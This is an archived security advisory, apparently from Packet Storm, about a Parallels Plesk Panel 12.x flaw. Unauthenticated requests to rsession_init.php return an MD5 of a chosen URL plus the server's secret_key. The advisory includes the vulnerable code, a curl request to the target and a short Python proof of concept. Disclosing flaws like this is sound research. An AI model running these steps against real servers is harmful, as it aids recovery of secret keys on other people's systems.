exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Parallels Plesk Panel 12.x Key Disclosure

Parallels Plesk Panel 12.x Key Disclosure
Posted Apr 22, 2014
Authored by Tim Rots

Parallels Plesk Panel version 12.x for Linux discloses /etc/psa/private/secret_key as an MD5 hash allowing for offline attacks to crack it.

tags | exploit, info disclosure
systems | linux
SHA-256 | 1445454f592a31c6187c107c5845c4007b83d4ca8f3adc887948aa9909a38116

Parallels Plesk Panel 12.x Key Disclosure

Change Mirror Download
While auditing the source code for Parallels Plesk Panel 12.x on Linux I
noticed the following feature that leads to leakage of the
'/etc/psa/private/secret_key'-file in md5 format to non-authenticated users.

Parallels responded that the 16byte 'secret_key' should provide sufficient
entropy for this not being an issue.
Soooo... even if I can control part of the salt to calculate the md5sum..?
See for yourself.


Code where the bug resides in:
----
/opt/psa/admin/htdocs/enterprise/rsession_init.php

31 if ($failureRedirectUrl = get_gpc('failure_redirect_url')) {
36 hspc_setopt('failure_redirect_url', $failureRedirectUrl);
>37 hspc_setopt('failure_redirect_url_sign', md5($failureRedirectUrl .
Plesk_Base_Utils_String::getCryptKey()));
38 }
...
..
/opt/psa/admin/plib/Plesk/Base/Utils/String.php

363 final public static function getCryptKey() {
...
369 if (Os::UNIX) {
370 self::$_cryptKey = @file_get_contents(ENCRYPT_KEY_FILE);
..
380 return self::$_cryptKey;
381 }
...
..
/opt/psa/admin/plib/compile_time_defaults.php

12 define('ENCRYPT_KEY_FILE', "/etc/psa/private/secret_key");
----


Summary of bug:

- user sends 1 HTTP requst to rsession_init.php on the remote server which
contains an invalid PHPSESSIONID and a redirect URL for when the login
fails.
- script sets two cookies which contains the following values:
failure_redirect_url = $failureRedirectUrl (supplied in URL)
failure_redirect_url_sign = md5($failureRedirectUrl + contents
/etc/psa/private/secret_key)

[+] Annoying redirect loop if localhost is specified as url to to redirect
to when login fails until cookies are cleared.


PoC:
root@debian7:~# #see /usr/local/psa/admin/sbin/encrypt_keygen for details
on key generation routine
root@debian7:~# dd if=/dev/urandom of=/etc/psa/private/secret_key bs=16
count=1
1+0 records in
1+0 records out
16 bytes (16 B) copied, 0.000183366 s, 87.3 kB/s

root@debian7:~# hexdump -C /etc/psa/private/secret_key
00000000 99 51 17 9a c6 8c 6e bd 4a 75 98 73 e2 64 fa e4
|.Q....n.Ju.s.d..|


$ curl -k -i -s "
https://debian7:8443/enterprise/rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url=w00t"|awk
'/fail/ {print $2}'
.
..
...
failure_redirect_url=w00t;
failure_redirect_url_sign=03ba5675030c59bf66bbc2f4d30aec61;


root@debian7:~# ./poc.py
03ba5675030c59bf66bbc2f4d30aec61

---poc.py---
#! /usr/bin/env python

import hashlib
import binascii

with open('/etc/psa/private/secret_key') as f:
whoops = hashlib.md5("w00t" +
binascii.unhexlify(f.read().encode('hex'))).hexdigest()
print whoops
------


In theory this bug will give you enough ammunition to calculate the
contents of the /etc/psa/private/secret_key as we have part of the salt,
and already know the outcome of a insecure hashing algorithm to match
against.
I'm glad nobody owns the amount of computing power which is required to
abuse this bug nowadays anyhow .. :']

Regards,

Tim Rots

The Netherlands


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close